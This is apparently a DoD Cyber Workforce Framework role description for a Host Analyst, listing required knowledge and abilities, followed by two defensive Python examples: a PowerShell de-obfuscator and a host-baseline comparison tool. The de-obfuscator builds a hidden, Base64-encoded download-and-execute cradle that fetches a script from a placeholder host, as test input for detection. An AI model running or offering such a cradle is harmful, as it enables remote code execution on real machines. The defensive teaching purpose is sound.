Host Analyst

Work Role ID: 463  |  Workforce Element: Cyberspace Effects

What does this role do? A Host Analyst (HA) has knowledge of the system configurations likely to be encountered, of system services and their security and configuration, and of file systems, permissions, and operating system configurations. The Host Analyst conducts analysis using the tools and capabilities built into those systems.

CORE KSATs

KSAT ID  Description  KSAT Type
22 * Knowledge of computer networking concepts and protocols, and network security methodologies. Knowledge
108 * Knowledge of risk management processes (e.g., methods for assessing and mitigating risk). Knowledge
1157 * Knowledge of national and international laws, regulations, policies, and ethics as they relate to cybersecurity. Knowledge
1158 * Knowledge of cybersecurity principles. Knowledge
1159 * Knowledge of cyber threats and vulnerabilities. Knowledge
6900 * Knowledge of specific operational impacts of cybersecurity lapses. Knowledge
6935 * Knowledge of cloud computing service models: Software as a Service (SaaS), Infrastructure as a Service (IaaS), and Platform as a Service (PaaS). Knowledge
6938 * Knowledge of cloud computing deployment models in private, public, and hybrid environments and the differences between on-premises and off-premises environments. Knowledge

ADDITIONAL KSATs

KSAT ID  Description  KSAT Type
4171 Ability to analyze a finding of a compromise and develop a custom signature(s) and/or rule(s) to identify it throughout the network Ability
4172 Ability to analyze adversarial avenues of approach on a mission-critical system Ability
4174 Ability to analyze Data at Rest and Data in Transit encryption methodologies and assess Data at Rest and Data in Transit policies in support of identifying outliers to delineate possible avenues of approach. Ability
4176 Ability to analyze how the tools operate to enumerate the system Ability
4179 Ability to analyze multiple memory captures, determine anomalous behavior and develop a detailed report that includes a timeline of compromise Ability
4182 Ability to analyze organizational policies and documentation for appropriate use and user privileges to determine current user access rights policies Ability
4184 Ability to analyze potentially malicious processes, libraries and modules on a system Ability
4185 Ability to analyze process lists within Windows, Unix, or Linux operating systems Ability
4186 Ability to analyze software installed and in use on a system, and on a host machine and compare it to the authorized software list provided by the network owner Ability
4187 Ability to analyze tools/hardware used to extract/analyze/capture memory and disk images Ability
4188 Ability to analyze user-mode/kernel mode rootkits and how they function and differ Ability
4189 Ability to analyze vulnerabilities and misconfiguration without Information Assurance artifacts. Ability
4195 Ability to build a baseline of configuration/state for host machines Ability
4197 Ability to capture a memory image from a host workstation Ability
4198 Ability to capture forensically sound memory and disk images with regard to timeline analysis Ability
4206 Ability to gather active user accounts on a network and compare them to the authorized user list and the appropriate Standard Operating Procedure (SOP) Ability
4207 Ability to compare current state against baselines Ability
4209 Ability to compile group policies and access control lists from mission partner networks. Ability
4210 Ability to compile host-based firewall and host intrusion prevention system configurations through group policy modifications Ability
4211 Ability to conduct disk forensics on multiple images Ability
4216 Ability to configure log aggregation Ability
4217 Ability to configure, forward and statistically analyze logs Ability
4225 Ability to correlate indicators of compromise Ability
4232 Ability to de-obfuscate (e.g. command line execution, string substitution, clandestine side channel, Base64). Ability
4234 Ability to develop a risk defense plan (e.g. behavioral development, etc.) and put active measures in place in defense of a network, endpoint, and/or host. Ability
4237 Ability to develop dashboards to better visualize data Ability
4238 Ability to develop host-based IDS/IPS signatures and settings Ability
4239 Ability to develop the reporting and recording of discovered potentially malicious processes, libraries, and modules on a compromised system Ability
4245 Ability to enumerate domain security groups. Ability
4246 Ability to enumerate knowledge management applications (e.g. SharePoint) and their service accounts/security groups. Ability
4247 Ability to enumerate network shares and identify ACLs/security permissions and analyze for vulnerabilities/misconfigurations (e.g. SMB, NFS, iSCSI). Ability
4250 Ability to evaluate common Tactics, Techniques and Procedures (TTP) used in malware and open-source and Intelligence Community (IC) resources available to identify emerging TTPs Ability
4251 Ability to evaluate compliance with Security Technical Implementation Guides (STIGs) on host machines by utilizing a compliance scanner in support of identifying outliers in order to delineate possible avenues of approach Ability
4252 Ability to evaluate if patches are up to date for all hosts, determine the current process for updating patches and determine the current patch level for all hosts on a network according to NIST Special Publication 800-40 in support of identifying outliers in order to delineate possible avenues of approach. Ability
4256 Ability to evaluate rogue/unauthorized systems on a network Ability
4257 Ability to evaluate security posture shortcomings in group policy Ability
4258 Ability to evaluate steps taken after host-based IDS/IPS alerts, verify the finding and ensure its volatility Ability
4259 Ability to evaluate systems resiliency in adverse conditions Ability
4262 Ability to export/enumerate information (e.g., users, groups) from a Domain Controller. Ability
4266 Ability to identify activity context in log entries to correlate indicators of compromise. Ability
4269 Ability to identify anomalous network traffic on a host machine. Ability
4273 Ability to identify critical infrastructure systems with information communication technology that were designed without system security considerations. Ability
4281 Ability to identify new indicators of compromise through anomalous behavior in log entries. Ability
4283 Ability to identify security posture shortcomings Ability
4284 Ability to identify tools and techniques available for analyzing binary applications and interpreted scripts. Ability
4287 Ability to identify/select the most appropriate tools and solutions for the specific environment (e.g. disk/memory forensics/capture, host enumeration, application whitelisting, log aggregation and analysis, HIPS/HIDS solutions, etc.). Ability
4288 Ability to implement and configure host-based firewalls and host intrusion prevention systems Ability
4289 Ability to implement Data at Rest and Data in Transit encryption methodologies and assess Data at Rest and Data in Transit policies. Ability
4302 Ability to measure known vulnerabilities against known vectors of approach. Ability
4306 Ability to monitor Active Directory (AD) for creation of unauthorized/potentially malicious accounts. Ability
4309 Ability to operate specified tools to enumerate a system. Ability
4312 Ability to organize Active Directory (AD) hierarchy structure. Ability
4313 Ability to organize logging and auditing procedures including server-based logging. Ability
4315 Ability to organize order of the volatility when capturing artifacts. Ability
4318 Ability to perform and analyze situational awareness commands within Windows, Unix, and Linux operating systems (e.g. systeminfo, netstat, ipconfig, tasklist, ls, ifconfig, etc.) Ability
4319 Ability to perform and analyze vulnerability scans on host machines in support of identifying outliers in order to delineate possible avenues of approach. Ability
4320 Ability to perform complex root-cause analysis to determine the root cause of an intrusion and recommend mitigations. Ability
4323 Ability to perform dynamic analysis. Ability
4326 Ability to perform static analysis. Ability
4331 Ability to prioritize how Operating System (OS) and application patches are distributed in different systems. Ability
4332 Ability to prioritize Operating Systems (OS) default processes, library, and modules based on boot order, dependencies, or key operations. Ability
4337 Ability to provide host analysis for Risk Mitigation Plan (RMP) to improve customer security overall posture. Ability
4339 Ability to provide mitigations to recover from a full network compromise. Ability
4351 Ability to select the best tools to enumerate a given set of host machines in order to validate whether they match known baselines. Ability
4363 Ability to use and integrate a Security Information and Event Management (SIEM) platform. Ability
4371 Ability to use host volatile data to compare active processes, libraries and modules against databases of known good/bad. Ability
4375 Ability to utilize Defense Information Systems Agency (DISA)/ Department of Defense (DoD) system configuration guidelines. Ability
4390 Knowledge of Active Directory Federation Services (AD FS). Knowledge
4413 Knowledge of common information network malware (e.g., viruses, trojans, etc.) and vectors of attack (e.g., ports, attachments, etc.). Knowledge
4415 Knowledge of common obfuscation techniques (e.g. command line execution, string substitution, clandestine side channel, Base64). Knowledge
4416 Knowledge of common persistence locations within Windows, Unix, or Linux operating systems. Knowledge
4427 Knowledge of cybersecurity and cybersecurity-enabled software products. Knowledge
4429 Knowledge of cybersecurity controls and design principles and methods (e.g., firewalls, DMZ, and encryption). Knowledge
4430 Knowledge of cybersecurity Risk Management Framework (RMF) process. Knowledge
4434 Knowledge of DCO capabilities, including open-source tools, and their capabilities. Knowledge
4435 Knowledge of Defense-In-Depth principles. Knowledge
4438 Knowledge of different types of log subscriptions (e.g. push vs. pull, Windows Event Forwarding, Winlogbeat, syslog). Knowledge
4443 Knowledge of evasion strategies and TTPs (e.g., noise, stealth, situational awareness, bandwidth throttling). Knowledge
4445 Knowledge of existing cybersecurity principles, policies, and procedures Knowledge
4452 Knowledge of full-spectrum of cyberspace operations in an intelligence-driven DCO environment. Knowledge
4501 Knowledge of non-Active Directory domains (e.g. IDM, LDAP). Knowledge
4522 Knowledge of public key infrastructure (PKI) libraries, certificate authorities, certificate management, and encryption functionalities. Knowledge
4537 Knowledge of stream providers (e.g. Kafka). Knowledge
4539 Knowledge of structured response frameworks (e.g. MITRE ATT&CK, Lockheed Martin Kill Chain, Diamond Model). Knowledge
4583 Knowledge of the U.S. Security System authorities, responsibilities, and contributions to the cyberspace operations mission. Knowledge
4585 Knowledge of the Windows registry hive keys and the information contained within each one. Knowledge
4589 Knowledge of typical system processes within Windows, Unix, or Linux operating systems Knowledge
4595 Knowledge of web applications and their common attack vectors. Knowledge
4599 Skill in analyzing endpoint collection data. Skill
4655 Skill in providing support to intelligence analysts to understand the operational environment and how it ties to intelligence reporting. Skill
4660 Skill in refining research (e.g., vulnerabilities, TTPs) to assist intelligence analysts’ preparation of products. Skill
4665 Skill in run level configurations in a Linux or UNIX environment Skill
4679 Skill in using various online tools for open-source research (e.g., online trade, DNS, mail, etc.). Skill
8036 Conduct open source research via various online tools. Task
8041 Confer with systems analysts, engineers, programmers, and others to design applications and to obtain information on project limitations and capabilities, performance requirements, and interfaces. Task
8111 Identify potential points of strength and vulnerability among segments of a network map. Task
8115 Identify tools/hardware used to extract/analyze/capture memory and disk images. Task
8151 Perform security reviews and identify gaps in security architecture that can be used in the development of a security risk management plan. Task
8161 Provide and maintain documentation for TTPs as inputs to training programs. Task
8212 Validate intrusion detection system (IDS) alerts. Task
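KSATs 4232 and 4415 call for de-obfuscating command lines that hide their payload behind Base64 and string substitution. The following Python is an added worked example, not part of the DCWF role definition or of any fielded DoD tool: it peels the layers a PowerShell launcher commonly stacks (an -EncodedCommand UTF-16LE Base64 payload, inline FromBase64String() literals, 'a' + 'b' concatenation) and records each layer so the report can state what was hidden at each step. The command line it analyzes is constructed for the example; the host name example.invalid and the path /stage.ps1 are placeholders.

```python
"""Peel common command-line obfuscation layers (KSATs 4232 / 4415): Base64-encoded
PowerShell (-EncodedCommand), inline FromBase64String() literals and string
concatenation. Each successful transform is recorded as a layer for the report."""
import base64
import re
from typing import Callable, List, Optional, Tuple

# powershell.exe accepts any prefix of -EncodedCommand down to "-e"
# (-ExecutionPolicy needs "-ex", so "-e" is unambiguous); switches may use - or /.
_ENC_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENC_FLAG = re.compile(
    rf"(?i)(?<!\S)[-/](?:{_ENC_PREFIXES})\s+([A-Za-z0-9+/]{{16,}}={{0,2}})")

# [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('...')) or a bare
# FromBase64String('...'); the (?(1)\)) conditional eats GetString's closing paren
# only when that wrapper was present.
B64_LITERAL = re.compile(
    r"(?i)(\[(?:System\.)?Text\.Encoding\]::(UTF8|Unicode|ASCII)\.GetString\()?"
    r"\[(?:System\.)?Convert\]::FromBase64String\(\s*(['\"])([A-Za-z0-9+/=]+)\3\s*\)(?(1)\))")
_DOTNET_ENC = {"utf8": "utf-8", "unicode": "utf-16-le", "ascii": "ascii"}

# 'a' + 'b' and "a" + "b"
_CONCAT = [(re.compile(r"'([^']*)'\s*\+\s*'([^']*)'"), "'"),
           (re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"'), '"')]


def decode_b64_text(b64: str, encoding: Optional[str] = None) -> Optional[str]:
    """Decode Base64 to text, or None if it is not valid Base64. -EncodedCommand
    payloads are UTF-16LE; bare literals are usually UTF-8, so without a hint we
    sniff for the zero high bytes that UTF-16LE ASCII text leaves behind."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (ValueError, TypeError):          # binascii.Error is a ValueError
        return None
    if encoding is None:
        high = raw[1::2]
        encoding = "utf-16-le" if high and high.count(0) >= 0.8 * len(high) else "utf-8"
    return raw.decode(encoding, errors="replace")


def unwrap_encoded_command(s: str) -> str:
    """Replace a launcher carrying -EncodedCommand with the script it encodes."""
    m = ENC_FLAG.search(s)
    if not m:
        return s
    script = decode_b64_text(m.group(1), "utf-16-le")
    return script if script is not None else s


def decode_base64_literals(s: str) -> str:
    """Replace FromBase64String('...') calls with the decoded PowerShell literal."""
    def repl(m) -> str:
        text = decode_b64_text(m.group(4), _DOTNET_ENC.get((m.group(2) or "").lower()))
        return m.group(0) if text is None else "'" + text.replace("'", "''") + "'"
    return B64_LITERAL.sub(repl, s)


def join_concatenations(s: str) -> str:
    """Fold 'a' + 'b' chains (both quote styles) until nothing changes."""
    changed = True
    while changed:
        changed = False
        for rx, q in _CONCAT:
            new = rx.sub(lambda m, q=q: q + m.group(1) + m.group(2) + q, s)
            if new != s:
                s, changed = new, True
    return s


TRANSFORMS: List[Tuple[str, Callable[[str], str]]] = [
    ("encodedcommand", unwrap_encoded_command),
    ("frombase64string", decode_base64_literals),
    ("string-concat", join_concatenations),
]


def deobfuscate(cmdline: str, max_layers: int = 16) -> List[Tuple[str, str]]:
    """Apply transforms until a fixed point; returns [(layer_name, text), ...]
    starting with the raw command line. max_layers bounds pathological nesting."""
    layers = [("raw", cmdline)]
    cur = cmdline
    for _ in range(max_layers):
        for name, fn in TRANSFORMS:
            new = fn(cur)
            if new != cur:
                layers.append((name, new))
                cur = new
                break
        else:
            break                            # no transform changed anything
    return layers


def extract_urls(text: str) -> List[str]:
    return re.findall(r"https?://[^\s'\"()]+", text)


def build_sample() -> str:
    """Constructed sample, not from a real incident: an encoded launcher whose inner
    script hides the host in a second Base64 layer and splits the URL scheme."""
    host_b64 = base64.b64encode(b"example.invalid").decode()
    script = ("IEX (New-Object Net.WebClient).DownloadString('ht' + 'tp://' + "
              "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("
              f"'{host_b64}')) + '/stage.ps1')")
    enc = base64.b64encode(script.encode("utf-16-le")).decode()
    return f"powershell.exe -NoP -NonI -W Hidden -enc {enc}"


if __name__ == "__main__":
    layers = deobfuscate(build_sample())
    for name, text in layers:
        print(f"[{name}] {text[:120]}")
    print("URLs:", extract_urls(layers[-1][1]))
```

The fixed-point loop matters more than any single regex: real launchers nest these tricks, and stopping after one pass leaves the indicator hidden. The three transforms here do not cover every PowerShell idiom (the -join operator, -f format strings, [char] arrays), so treat an unchanged final layer that still contains such constructs as work for manual analysis rather than as clean.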
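KSATs 4195, 4207, 4371 and 4589 describe building a baseline of host state and comparing a later state against it and against known-good/known-bad lists. The following Python is an added example, not part of the role definition or of any fielded tool: two constructed process snapshots (image path, abbreviated hash, parent image, listening ports) are diffed to surface new, changed and missing binaries, a known-bad hash, a system-process name running from the wrong directory or under the wrong parent, and a newly listening port. The expected directories and parents for the Windows system processes are reference values assumed for the example.

```python
"""Diff a host snapshot against its baseline and against known-good/known-bad
lists (KSATs 4195, 4207, 4371, 4589). A snapshot is the list of running processes
with image path, SHA-256, parent image name and listening TCP ports. Both
snapshots below are constructed for the example and the hashes are abbreviated."""
import json
import ntpath
from typing import Dict, List, Set, Tuple

# Where these Windows system binaries are expected to live and what should spawn
# them (assumed reference values for the example; lower-case for comparison).
EXPECTED_SYSTEM_DIR: Dict[str, str] = {
    "services.exe": r"c:\windows\system32",
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}
EXPECTED_PARENT: Dict[str, str] = {"svchost.exe": "services.exe", "lsass.exe": "wininit.exe"}

# Constructed baseline captured while the host was believed clean.
BASELINE_JSON = r"""[
 {"path": "C:\\Windows\\System32\\services.exe", "sha256": "h-services", "parent": "wininit.exe", "ports": []},
 {"path": "C:\\Windows\\System32\\svchost.exe",  "sha256": "h-svchost",  "parent": "services.exe", "ports": [135]},
 {"path": "C:\\Windows\\System32\\lsass.exe",    "sha256": "h-lsass",    "parent": "wininit.exe", "ports": []},
 {"path": "C:\\Windows\\explorer.exe",           "sha256": "h-explorer", "parent": "userinit.exe", "ports": []},
 {"path": "C:\\Program Files\\EDR\\sensor.exe",  "sha256": "h-sensor",   "parent": "services.exe", "ports": []}
]"""
# Constructed later snapshot: the EDR sensor is gone, lsass.exe's hash changed, and a
# copy of svchost.exe runs from a user Temp directory under explorer.exe on port 4444.
CURRENT_JSON = r"""[
 {"path": "C:\\Windows\\System32\\services.exe", "sha256": "h-services", "parent": "wininit.exe", "ports": []},
 {"path": "C:\\Windows\\System32\\svchost.exe",  "sha256": "h-svchost",  "parent": "services.exe", "ports": [135]},
 {"path": "C:\\Windows\\System32\\lsass.exe",    "sha256": "h-lsass-2",  "parent": "wininit.exe", "ports": []},
 {"path": "C:\\Windows\\explorer.exe",           "sha256": "h-explorer", "parent": "userinit.exe", "ports": []},
 {"path": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\svchost.exe", "sha256": "h-evil", "parent": "explorer.exe", "ports": [4444]}
]"""
KNOWN_BAD: Set[str] = {"h-evil"}          # constructed stand-in for a threat-intel hash list


def load_snapshot(text: str) -> List[dict]:
    """Parse a snapshot and normalise paths and parents to lower case for comparison."""
    procs = json.loads(text)
    for p in procs:
        p["path"] = p["path"].lower()
        p["name"] = ntpath.basename(p["path"])
        p["parent"] = p["parent"].lower()
    return procs


def _images(procs: List[dict]) -> Set[Tuple[str, str]]:
    return {(p["path"], p["sha256"]) for p in procs}


def _ports(procs: List[dict]) -> Set[int]:
    return {port for p in procs for port in p.get("ports", [])}


def compare(baseline: List[dict], current: List[dict], known_bad: Set[str]) -> List[dict]:
    """Return every deviation from the baseline and from the known-good model."""
    findings: List[dict] = []
    base_images, cur_images = _images(baseline), _images(current)
    base_paths = {path for path, _ in base_images}
    cur_paths = {path for path, _ in cur_images}
    for path, sha in sorted(cur_images - base_images):
        rule = "changed-binary" if path in base_paths else "new-binary"
        findings.append({"rule": rule, "path": path, "sha256": sha})
    for path, sha in sorted(base_images - cur_images):
        if path not in cur_paths:             # gone entirely, not merely re-hashed
            findings.append({"rule": "missing-baseline-process", "path": path, "sha256": sha})
    for p in current:
        if p["sha256"] in known_bad:
            findings.append({"rule": "known-bad-hash", "path": p["path"], "sha256": p["sha256"]})
        want_dir = EXPECTED_SYSTEM_DIR.get(p["name"])
        if want_dir and ntpath.dirname(p["path"]) != want_dir:
            findings.append({"rule": "masquerading-system-process", "path": p["path"],
                             "dir": ntpath.dirname(p["path"])})
        want_parent = EXPECTED_PARENT.get(p["name"])
        if want_parent and p["parent"] != want_parent:
            findings.append({"rule": "unexpected-parent", "path": p["path"], "parent": p["parent"]})
    for port in sorted(_ports(current) - _ports(baseline)):
        owner = next(p["path"] for p in current if port in p.get("ports", []))
        findings.append({"rule": "new-listening-port", "path": owner, "port": port})
    return findings


def analyze() -> List[dict]:
    return compare(load_snapshot(BASELINE_JSON), load_snapshot(CURRENT_JSON), KNOWN_BAD)


if __name__ == "__main__":
    for finding in analyze():
        print(finding)
```

The same binary can trip several rules at once, which is the point: a new-binary hit alone might be a legitimate install, but new binary plus system-process name in a Temp directory plus wrong parent plus a fresh listening port is a different conversation. A changed hash on a genuine system binary (lsass.exe here) is usually patching, so that rule is a prompt to check the patch record from KSAT 4252 rather than a verdict.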